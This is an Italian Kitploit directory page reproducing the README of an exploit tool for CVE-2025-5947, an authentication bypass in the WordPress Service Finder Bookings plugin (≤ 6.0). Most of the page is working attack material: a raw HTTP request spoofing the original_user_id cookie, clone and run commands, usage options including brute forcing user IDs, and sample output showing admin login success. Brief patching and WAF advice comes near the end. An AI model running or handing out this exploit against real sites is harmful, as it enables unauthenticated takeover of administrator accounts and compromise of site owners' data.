Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit | Kitploit
Strumenti/GitHubGitHub/xxconi/cve-2025-5947
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Strumento di exploit per la vulnerabilità di bypass dell'autenticazione nel plugin WordPress Service Finder Bookings ≤ 6.0

📋 Indice

  • Informazioni sulla Vulnerabilità
  • Dettagli Tecnici
  • Installazione
  • Utilizzo
  • Esempi
  • Risultati
  • Sicurezza
  • Risorse

🔴 Informazioni sulla Vulnerabilità

CVE-2025-5947

Nel plugin WordPress Service Finder Bookings versione 6.0 e precedenti è presente una vulnerabilità critica di bypass dell'autenticazione.

🎯 Impatto

Attaccanti non autenticati possono:

  • ✅ Accedere come qualsiasi utente
  • ✅ Ottenere accesso agli account amministrativi
  • ✅ Acquisire il controllo completo del sistema
  • ✅ Effettuare fughe di dati
  • ✅ Caricare codice malevolo

🔍 Dettagli Tecnici

Causa della Vulnerabilità

Nella funzione service_finder_switch_back() c'è una verifica insufficiente del cookie:

root@kitploit:~
// Codice non sicuro
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Nessuna verifica!
}

Vettore di Attacco

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Caratteristiche dell'Attacco:

  • 🌐 Accesso Remoto (AV:N)
  • 🔓 Nessuna Autenticazione (PR:N)
  • 👤 Nessuna Interazione Utente (UI:N)
  • 📊 Impatto Totale (C:H, I:H, A:H)

📦 Installazione

Requisiti

  • Python 3.6+
  • Libreria requests

Passo 1: Clona il Repository

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Passo 2: Installa le Dipendenze

root@kitploit:~
pip install -r requirements.txt

Passo 3: Esegui

root@kitploit:~
python exploit.py -u http://target.com

🚀 Utilizzo

Comandi di Base

root@kitploit:~
# Mostra aiuto
python exploit.py -h

# Tenta l'accesso come amministratore (ID=1)
python exploit.py -u http://target.com

# Con ID utente specifico
python exploit.py -u http://target.com -i 5

# Forza bruta (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# Senza verifica SSL
python exploit.py -u http://target.com --no-ssl-verify

# Con timeout personalizzato
python exploit.py -u http://target.com -t 30

Parametri

💡 Esempi

Esempio 1: Exploit Semplice

root@kitploit:~
python exploit.py -u http://wordpress.local

Output:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Plugin Service Finder Bookings trovato

🔍 Tentativo di accesso con ID utente 1 in corso...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ SUCCESSO! Accesso effettuato come amministratore!
📍 Reindirizzamento: http://wordpress.local/wp-admin/

Esempio 2: Forza Bruta

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

Output:

root@kitploit:~
🔄 Forza Bruta in corso (20 utenti)...
✅ ID utente 1: SUCCESSO
❌ ID utente 2: Fallito
✅ ID utente 3: SUCCESSO
...
✅ Utenti riusciti: [1, 3, 5]

Esempio 3: Con HTTPS senza verifica SSL

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 Risultati

Un exploit riuscito include i seguenti indicatori:

✅ Codice di risposta HTTP 301 o 302
✅ Presenza di /wp-admin/ nell'header Location
✅ Presenza di wordpress_logged_in_ nell'header Set-Cookie

🛡️ Sicurezza

⚠️ Avviso Legale

Questo strumento deve essere utilizzato solo per:

  • ✅ Test di sicurezza autorizzati
  • ✅ Sui propri sistemi
  • ✅ Con autorizzazione scritta

L'autore non si assume alcuna responsabilità.

🔐 Misure di Protezione

  1. Aggiornamento Urgente

    root@kitploit:~
    # Aggiorna dal pannello di amministrazione WordPress
    # o con WP-CLI
    wp plugin update sf-booking
    
  2. Disattivare il Plugin

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. Rimuovere il Plugin

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Blocca: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Controllo di Sicurezza

    • Verifica gli account amministrativi
    • Esamina i log di accesso
    • Cerca accessi non autorizzati

📚 Risorse

  • Database Patchstack
  • GitHub Advisory
  • Dettagli NVD
  • Exploit Originale
  • Calcolatore CVSS

🤝 Come Contribuire

Per segnalare bug o suggerire miglioramenti:

  1. Fai un fork
  2. Crea un branch per la feature (git checkout -b feature/improvement)
  3. Commit (git commit -am 'Add improvement')
  4. Push (git push origin feature/improvement)
  5. Apri una Pull Request

📄 Licenza

MIT License - Per i dettagli consulta il file LICENSE

👤 Autore

Security Researcher

  • GitHub: @yourusername

🙏 Ringraziamenti

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ Se ti è stato utile, lascia una stella!

🔝 Torna su

Scarica lo strumento
CaratteristicaValore
CVE IDCVE-2025-5947
PluginService Finder Bookings (sf-booking)
Versione Interessata≤ 6.0
Gravità🔴 CRITICA
Punteggio CVSS9.8
CWECWE-639 (Bypass dell'autorizzazione)
Punteggio EPSS0.617 (98.357 percentile)
Data di Pubblicazione2025
ParametroAbbreviazioneDescrizionePredefinito
--url-uURL di destinazione (obbligatorio)-
--user-id-iID utente1
--brute-force-bIntervallo di forza bruta (1-10)-
--no-ssl-verify-Disabilita verifica SSLFalse
--timeout-tTimeout richiesta (secondi)10